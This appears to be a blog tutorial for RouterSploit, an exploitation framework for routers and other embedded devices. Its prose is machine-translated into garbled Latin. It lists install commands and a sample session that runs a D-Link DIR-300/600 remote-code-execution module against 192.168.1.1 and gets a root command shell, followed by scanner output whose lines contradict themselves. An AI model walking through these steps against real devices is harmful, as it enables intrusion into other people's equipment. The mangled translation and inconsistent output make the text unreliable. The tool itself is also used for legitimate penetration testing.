Home » Linux Tools » RouterSploit – Abusionem Framework Complete Tutorial [2020]

RouterSploit – Abusionem Framework Complete Tutorial [2020]

by Suyash
routersploit

RouterSploit mirabilis abusus compage specialiter embedded cogitationes.

Hoc instrumentum adhiberi potest a pentestro ad securitatem camerarum et iter itineris scan.

RouterSploit volutpat:

  • Coded in Python.
  • Imperium-linea interface.
  • Docker firmamentum.
  • Instrumenta modulari.

Supported OS:

  1. MacOS.
  2. Linux.
  3. Android Phone.
  4. Windows.

installing RouterSploit:

Requisita:

  • futurum
  • petitiones
  • paramiko
  • pysnmp
  • pycrypto

Libitum:

  • bluepy – bluetooth humilis industria

Installing in Kali Linux:

Sequi imperia infra:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Minimum Energy firmamentum Bluetooth:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installing in Ubuntu:

Sequi imperia infra:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Minimum Energy firmamentum Bluetooth:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installing in MacOS:

Sequi imperia infra:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Docker installing in:

Sequi imperia infra:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Quam ut Update RouterSploit??

Vos postulo ut saepe vitare incommodum RouterSploit update.

Novi moduli fere cotidie amet.

cd routersploit
git pull

Quomodo uti RouterSploit?

Consuetudinem

root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Abusionem Framework for    |_|   by Threat9
            Embedded Devices
  
 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Protocollum   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Scanners: 4 Cres: 165 Generic: 4 Payloads: 32 Encoders: 6

rsf * >

Res gestae:

Ad faciendam Abusionem, modulus carpere iustus et pone in scopum:

rsf * > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Ad complementum usus tab clavem.

Ut ostenderet optiones, typeshow:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Nomen Current occasus Descriptio                                
   ----       ----------------     -----------                                
   target target electronica e.g. http"://192.168.1.1     
   port       80                   Scopum Portus

Ususrun or *exploit iubes uti scopum:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > Curre
[+] Scopum est vulnerable
[*] Invocans mandatum ansa ...
cmd > whoami
root

Ad optiones:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > set scopum http "://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Inhibere possibile est si scopus ad facinus particulare vulnerandum est:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > reprehendo
[+] Scopum est vulnerable

Curreshow info ut ostenderet info de rebus.

Scanning for vulnerable Targets:

Scanners permittite cito cognoscere, si scopus vulnerabilis est ad quaslibet res gestas.

Iisdem imperiis ostendere / set bene, et currere.

rsf * (D-Link Scanner) > Curre
[+] res gestae/dlink/dwr_932_info_disclosure est vulnerable
[-] res / dlink / dir_300_320_615_auth_bypass non est vulnerable
[-] res / dlink/dsl_2750b_info_disclosure est vulnerable
[-] res / dlink / dns_320l_327l_rce non vulnerable
[-] res / dlink / dir_645_password_disclosure est vulnerable
[-] res / dlink / dir_300_600_615_info_disclosure est vulnerable
[-] res / dlink / dir_300_600_rce non est vulnerable

[+] Fabrica est vulnerable!
- res gestae/dlink/dwr_932_info_disclosure

Officialis RouterSploit

Etiam Read: 1337x procuratorem

Ultima verba:

RouterSploit mirabile instrumentum ad usus.

Si quis quaestiones de faciem tuam RouterSploit. Vide infra explanare. Manipulus noster CSHAWK tactus erit vobiscum asap.

Leave a comment